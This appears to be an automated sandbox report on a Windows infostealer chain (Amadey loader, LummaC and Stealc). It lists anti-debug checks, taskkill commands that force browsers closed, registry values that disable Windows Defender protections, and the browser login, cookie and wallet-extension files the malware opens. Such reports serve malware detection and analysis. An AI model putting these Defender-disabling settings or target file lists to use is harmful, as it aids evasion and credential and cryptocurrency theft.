Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05380C07 rdtsc 0_2_05380C07
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0040A54A
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 7_2_00402A20
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC652B mov eax, dword ptr fs:[00000030h] 0_2_00AC652B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ACA302 mov eax, dword ptr fs:[00000030h] 0_2_00ACA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0022A302 mov eax, dword ptr fs:[00000030h] 2_2_0022A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0022652B mov eax, dword ptr fs:[00000030h] 2_2_0022652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_0022A302 mov eax, dword ptr fs:[00000030h] 3_2_0022A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_0022652B mov eax, dword ptr fs:[00000030h] 3_2_0022652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0022A302 mov eax, dword ptr fs:[00000030h] 6_2_0022A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0022652B mov eax, dword ptr fs:[00000030h] 6_2_0022652B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_10007A76 mov eax, dword ptr fs:[00000030h] 7_2_10007A76
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_10005F25 mov eax, dword ptr fs:[00000030h] 7_2_10005F25
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00FFCF1B push dword ptr fs:[00000030h] 7_2_00FFCF1B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B70D90 mov eax, dword ptr fs:[00000030h] 7_2_04B70D90
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7092B mov eax, dword ptr fs:[00000030h] 7_2_04B7092B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00402EC0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc, 7_2_00402EC0
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_004099EA
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0040A54A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0040CDA3
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040A6E0 SetUnhandledExceptionFilter, 7_2_0040A6E0
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10002ADF
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_100056A0
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_10002FDA
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B79C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_04B79C51
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_04B7A7B1
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_04B7D00A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7A947 SetUnhandledExceptionFilter, 7_2_04B7A947
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 9_2_61EAF900
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EAF8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 9_2_61EAF8FC
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 3716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 5312, type: MEMORYSTR
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe "C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe "C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe "C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe "C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe "C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: ba17bbfb21.exe, 0000000B.00000002.3194386177.0000000000672000.00000002.00000001.01000000.0000000D.sdmp, ba17bbfb21.exe.6.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 79ddad050f.exe, 79ddad050f.exe, 00000008.00000002.3256159559.000000000054C000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: 0ms`Program Manager
Source: 79ddad050f.exe, 00000008.00000002.3256159559.000000000054C000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: o0ms`Program Manager
Source: 4611cc433b.exe, 4611cc433b.exe, 00000007.00000002.3256554166.00000000009AE000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: z?wProgram Manager
Source: file.exe, 00000000.00000002.2058469274.0000000000CD7000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2089326329.0000000000437000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.2089930595.0000000000437000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: 6h%Program Manager
Source: firefox.exe, 0000001B.00000002.3262020047.0000001AF49FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?ProgmanListenerWi
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0020DD91 cpuid 6_2_0020DD91
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AACBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00AACBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_001F65E0 LookupAccountNameA, 6_2_001F65E0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00232517 GetTimeZoneInformation, 6_2_00232517
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Registry value created: TamperProtection 0
AV process strings found (often used to terminate AV products)
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 2.2.skotes.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.skotes.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.a90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3255134958.00000000001F1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2089024610.00000000001F1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2055475326.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2086144710.00000000001F1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: ba17bbfb21.exe PID: 3380, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 79ddad050f.exe PID: 5228, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 79ddad050f.exe PID: 2576, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 00000009.00000002.3254990045.0000000000251000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3255076281.0000000000251000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2997152380.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3265209742.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3165593747.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 3716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 5312, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 79ddad050f.exe, 00000008.00000003.2972144892.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\walletsb
Source: 79ddad050f.exe, 00000008.00000003.3179670006.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: 79ddad050f.exe, 00000008.00000003.2972144892.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version
Source: 79ddad050f.exe, 00000008.00000003.3179670006.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 79ddad050f.exe, 00000008.00000003.3093876019.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 79ddad050f.exe, 00000008.00000003.3093876019.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 79ddad050f.exe, 0000000A.00000003.3166621569.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: 79ddad050f.exe, 00000008.00000003.2978992587.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 79ddad050f.exe, 00000008.00000003.2978992587.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
